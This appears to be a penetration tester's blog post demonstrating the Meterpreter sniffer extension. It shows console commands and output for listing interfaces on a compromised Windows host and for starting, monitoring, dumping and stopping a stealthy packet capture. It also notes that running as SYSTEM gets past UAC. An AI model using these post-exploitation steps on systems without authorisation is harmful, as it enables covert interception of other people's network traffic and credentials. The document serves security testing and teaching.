HD released today a early sniffer beta module. This module uses the MicroOLAP Packet Sniffer SDK which is a commercial product, it can sniff packets from the target system without writing to the file system or installing any drivers. This adds to the stealthiest of the Meterpreter modules. The module automatically excludes its own control traffic from the packet capture. I have tested this module in the following Windows Versions and Privileges:
- Windows XP SP3 32 Bit – Administrator
- Windows 2003 SP2 32 bit – Administrator
- Windows 2008 SP2 32 bit – Administrator
- Vista SP2 32 bit with UAC – Administrator
- Vista SP2 32 bit no UAC – Administrator
- Windows 7 32 bit with UAC – Administrator
- Windows 7 32 bit no UAC – Administrator
- Vista SP2 32 bit with UAC – System
- Windows 7 32 bit with UAC – System
It worked on most the configurations without any problems, except for Windows Vista and Windows 7 with UAC enabled and running as Local Administrator, when ran as system the UAC protection was not able to mitigate the attack.
To start using this module one must only load the module while in a Meterpreter shell on a compromised target. This is achieved in the following manner:
meterpreter > use snifferLoading extension sniffer...success.meterpreter >Once the module is loaded one can proceed see the commands added to the console, to see the new commands one must only run the help command:
meterpreter > help.......Sniffer Commands================Command Description------- -----------sniffer_dump Retrieve captured packet datasniffer_interfaces List all remote sniffable interfaces
sniffer_start Capture packets on a previously opened interfacesniffer_stats View statistics of an active capturesniffer_stop Stop packet captures on the specified interfaceAs it can be seen the command allow one to:
- List the interfaces in the target host
- Start the packet capture
- Get a status of the number of packet captured and the size of the captured data
- Stop the capture
- Dump the captured data to a pcap file
Lets start by knowing to key pieces of information if not know which are what OS and under what account I’m running under:
meterpreter > sysinfoComputer: AWINXP01OS : Windows XP (Build 2600, Service Pack 2).meterpreter > getuidServer username: ACMEPRODINCAdministratormeterpreter >As we can see, the target machine is a Windows XP SP2 box and we are running under Domain Admin privileges in this box. We list the interfaces available on this box:
meterpreter > sniffer_interfaces1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )meterpreter >This command will give use lots of information like the MTU for the packets, if the interface usable for sniffing or not, if it is using DHCP to get its address and if it is a wireless interface. Know that we have the interfaces identified we can start sniffing on one of them:
meterpreter > sniffer_start 1 300000[*] Capture started on interface 1 (300000 packet buffer)meterpreter >When starting the capture one must provide the interface number and the packet buffer to capture, if none is given a packet buffer of 200,000 packets will be used. We can check on the size of the packet capture and number of packets by running the sniffer_stats command and the number of the interface:
meterpreter > sniffer_stats 1[*] Capture statistics for interface 1bytes: 17675packets: 196meterpreter >To clear the cache and save the capture to a file we run the sniffer_dump command and the file where we want to save the data to:
meterpreter > sniffer_dump 1 /tmp/capture.cap[*] Dumping packets from interface 1...
[*] Wrote 536 packets to PCAP file /tmp/capture.capmeterpreter >Packets are saved in PCAP format and the buffer on the target machine is cleared. We can dump the next buffer and append it to the existing PCAP file if we want:
meterpreter > sniffer_dump 1 /tmp/capture.cap[*] Dumping packets from interface 1...
[*] Wrote 536 packets to PCAP file /tmp/capture.capmeterpreter > sniffer_dump 1 /tmp/capture.cap[*] Dumping packets from interface 1...
[*] Wrote 216 packets to PCAP file /tmp/capture.capmeterpreter >To stop the packet capture we issue the sniffer_stop followed by the interface number to stop the capture:
meterpreter > sniffer_stop 1[*] Capture stopped on interface 1meterpreter >We can later examine our captured packets with any tool that can read PCAP files like Wireshark or Network Miner. I hope you find this module as useful as I know the Security Weekly crew will in our pentests.